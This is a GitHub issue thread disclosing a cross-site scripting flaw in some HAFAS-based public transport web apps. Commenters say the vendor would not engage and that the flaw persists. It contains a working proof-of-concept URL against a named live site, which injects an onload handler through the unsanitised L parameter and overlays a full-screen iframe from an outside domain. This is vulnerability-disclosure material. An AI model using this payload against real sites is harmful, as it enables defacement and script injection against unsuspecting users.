XSS vulnerability in some HAFAS instances #294
Assignees
Labels
Comments
|
Indeed, this is an XSS vulnerability in their HAFAS-based sites, not in I've tried to get in touch with HaCon about this by just calling their contact phone number. They told me it's none of their business since I'm not a business partner of them. 🤡 Will get in touch with @zerforschung later or tomorrow. Maybe they're interested in dealing with this. |
derhuerst
changed the title
|
Just for the record: This issue still exists in >=1 HAFAS deployments. 🤡 |
yes🤪 |
|
Just for the record: This issue still exists in >=1 HAFAS deployments. 🤡🤡 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
There is a Cross Site Scripting Security Vulnerability in the HAFAS Client.
For example this link:
https://fahrplan.vmobil.at/webapp/index.html?L=vs_vvv%2Fjs%2Fhafas_webapp_config.js%3Fv%3D1613454502135%22%20onload%3D%22var%20e%3D%20document.createElement%28%27iframe%27%29%3Be.src%3D%27https%3A%2F%2Ftrollface.dk%27%3Be.style.cssText%20%3D%20%27position%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Bz-index%3A100%3Bbackground%3A%23000%27%3Bdocument.body.appendChild%28e%29%3B%22
which results in the following html:
https://cdn.koeck.dev/276d8e.png
The vulnerable parameter is the L parameter which sets the customer. The parameter won't be sanitized.
I've found the vulnerability in several Web Apps which use the HAFAS client, but I'm not sure if the vulnerability is a bug in the hafas client or in the implementation of hafas. Just wanted to report the vulnerability here because my phone call was left unanswered :D
The text was updated successfully, but these errors were encountered: